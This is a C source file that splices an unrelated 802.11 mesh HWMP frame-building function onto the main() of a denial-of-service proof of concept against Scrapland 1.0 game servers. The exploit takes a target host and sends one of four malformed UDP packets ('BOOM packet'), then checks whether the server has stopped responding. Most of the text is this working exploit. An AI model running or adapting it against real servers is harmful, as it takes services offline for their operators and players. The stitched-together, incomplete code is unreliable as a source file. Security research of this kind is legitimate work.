/*
* Add a Mesh Path Error IE to a frame.
*/
static uint8_t *
hwmp_add_meshperr(uint8_t *frm, const struct ieee80211_meshperr_ie *perr)
{
int i;
*frm++ = IEEE80211_ELEMID_MESHPERR;
*frm++ = sizeof(struct ieee80211_meshperr_ie) - 2 +
(perr->perr_ndests - 1) * sizeof(*perr->perr_dests);
*frm++ = perr->perr_ttl;
*frm++ = perr->perr_ndests;
for (i = 0; i < perr->perr_ndests; i++) {
*frm++ = perr->perr_dests[i].dest_flags;
IEEE80211_ADDR_COPY(frm, perr->perr_dests[i].dest_addr);
frm += 6;
ADDWORD(frm, perr->perr_dests[i].dest_seq);
ADDSHORT(frm, perr->perr_dests[i].dest_rcode);
}
return frm;
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ],
info[] =
"\x7f"
"\x01\x00"
"\x00\x07",
pck[] =
"\x7f"
"\x00\x00"
"\x00\x00"
"\x00",
*p;
setbuf(stdout, NULL);
fputs("\n"
"Scrapland <= 1.0 server termination "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%d)]\n"
"\n"
"Attack:\n"
" 1 = big text string (size>SSize)\n"
" 2 = unexistent models (you can test this bug also modifying scrap.cfg)\n"
" 3 = newpos<=size\n"
" 4 = partial packet after small packet (1 or 2 bytes)\n"
"\n", argv[0], port);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
fputs("- request informations\n", stdout);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
SEND(info, sizeof(info) - 1);
RECV;
printf("\n Server name %s\n", buff + 10);
printf(" Players %d / %d\n\n",
*(u_short *)(buff + 8), *(u_short *)(buff + 6));
if(*(u_short *)(buff + 8) == *(u_short *)(buff + 6)) {
fputs("- Alert: the server is full so this attack will fail\n\n", stdout);
}
fputs("- send BOOM packet\n", stdout);
switch(atoi(argv[1])) {
case 1: {
pck[5] = 0xff; // major than 0x7f
*(u_short *)(pck + 1) = sizeof(pck) - 4;
SEND(pck, sizeof(pck) - 1);
} break;
case 2: {
p = buff;
*p++ = 0x7f;
p += 2; // data size
ADDSHORT(0); // don't know, pck related?
ADDTEXT("Unnamed Player"); // PlayerName
ADDTEXT("unexistent"); // PlayerModel
ADDSHORT(65); // PlayerMaxLife
ADDTEXT("unexistent"); // PilotModel
ADDTEXT("unexistent"); // Motor0Model
ADDTEXT("unexistent"); // Motor1Model
ADDTEXT("unexistent"); // Motor2Model
ADDTEXT("unexistent"); // Motor3Model
ADDTEXT("1,3,0,0,1,0,1"); // WeaponBayList
ADDLONG(0); // PlayerTeamID
*(u_short *)(buff + 1) = (p - buff) - 3;
SEND(buff, p - buff);
} break;
case 3: {
*(u_short *)(pck + 1) = 1; // major than 0
SEND(pck, 5);
} break;
case 4: {
SEND(pck, 1);
sleep(ONESEC);
*(u_short *)(pck + 1) = 0;
SEND(pck, 3);
} break;
default: {
fputs("\nError: wrong attack selected\n\n", stdout);
exit(1);
}
}
fputs("- check server:\n", stdout);
SEND(info, sizeof(info) - 1);
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
